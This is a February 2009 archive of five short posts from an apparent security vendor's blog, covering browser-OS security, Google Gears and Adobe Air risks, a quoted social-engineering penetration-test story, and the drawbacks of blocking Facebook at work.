Monthly Archives: February 2009

More on the browser OS – from Microsoft Research

Posted on by
2

After talking about how your next operating system is not going to be related to Windows or Mac or Linux (hint – you are reading this post using it… more details on our Annual report and predictions paper), I came across this research from Microsoft (direct to the PDF here) that talks about how to construct a secure browser OS given the fact that web browsing has moved quite substantially from viewing static web pages to almost running an OS on the browser.

The MS guys portray a secure browser constructed as a multi-principal operating system, while covering a lot of security fundamentals that are missing or lacking a proper implementation in modern browsers. A highly recommended reading and definitely worth following up on.

If Gears was a problem then how about running Gmail offline on Air?

Posted on by
Reply

So, yesterday I wrote about the new (and much expected) vulnerabilities in Google’s Gears technology. The issue is clear – Gears is picking up speed and traction as Google’s applications start to use it (i.e. Gmail, Docs, etc…) and its security model is being scrutinized. And then I stumbled across GeeMail. It’s basically offline Gmail without using Google’s technology. How do you do that? Simple – use Adobe’s Air™, as if one technology was not enough to deal with, try mixing and matching two for some added confusion and security standard overlap.

Just like Gears, Air has its benefits, (admittedly, I’m using them both), but seriously, this is just too much! So what’s the next step? Gmail offline using Adobe Air with Silverlight UI running through Yahoo! Pipes backend? Back in the days we used to follow a simple methodology – keep it simple (I’m omitting the latter part). Doing things just for the sake of using a specific technology is so 90’s “war of the programming languages”… everyone moved on to the simple model of using the right tool for the right job. In our case, even the review shows that the technology mix-up didn’t really cut it.

The oracle strikes again – “Browser OS” threats start to appear

Posted on by
3

Moving on from the social networking issues we outlined in the past couple of weeks, after following the predictions, and their materialization (here, here, here in the announcement of Gmail offline, here, and here), we can already see the “Browser OS”, as we dubbed it in our annual threat and predictions report, begin to materialize as well.

As per a recent Register article, threats related to Google Gears™ have started to appear – taking advantage of the extended capabilities granted to the browser – just like we predicted in our report. We named Google’s Gears, Adobe’s Air and Microsoft’s Silverlight as the prominent technologies that would be the enabler for the “Browser OS” and would be scrutinized for their security implications.

As always, we are not here to say “nay” to every new technology – just the opposite these technologies are the future, and they enable businesses and individuals alike to be more productive and have a better web experience. The only claim here is that more focus should be put on measures that take these technologies into account when implying to provide internet and web security, and enough forward looking vision to execute on it.

Social networking threats – the “hacker” story

Posted on by
1

As the social networking threats angle is picking up a lot of traction lately <pat_on_own_back>,  the folks at Netragard have posted a great write-up on using social networks as an attack tool – involving both social engineering as well as technical exploits. The post can be found here, and I just want to quote a couple of sections that I feel very strongly about:

“The social reconnaissance enabled us to identify 1402 employees 906 of which used facebook. We didn’t read all 906 profiles but we did read around 200 which gave us sufficient information to create a fake employee profile” … “After the payload was created and tested we started the process of building an easy to trust facebook profile. Because most of the targeted employees were male between the ages of 20 and 40 we decided that it would be best to become a very attractive 28 year old female. We found a fitting photograph by searching google images and used that photograph for our fake Facebook profile. We also populated the profile with information about our experiences at work by using combined stories that we collected from real employee facebook profiles.”

Needless to say that the newly created fake profile, which could just as well have been hijacked, went a long way in terms of enabling the attackers (who were commissioned to perform a penetration test this time) to gain access to internal company resources quite easily.

Blocking Facebook? Not popular, and not effective

Posted on by
Reply

OK, so we know that social networking sites have their issues and threats associated with them, we’ll be the first to admit it. But on the same note, we also know that just blocking/censoring them (pick the more politically correct term) is not working either. This is in light of the Maryland general assembly’s decision to block Facebook and MySpace from their computers.

It’s a lose-lose situation. You lose the added value of using social networking to leverage business, you lose the “popular” vote when your employees expect access to such sites, and you lose on the security front as simply blocking certain sites is not effective.

The solution as we see it here is to enable access to social networking sites, while stripping out any malicious content that may end up there, and control what functionality is permitted while browsing social networking sites.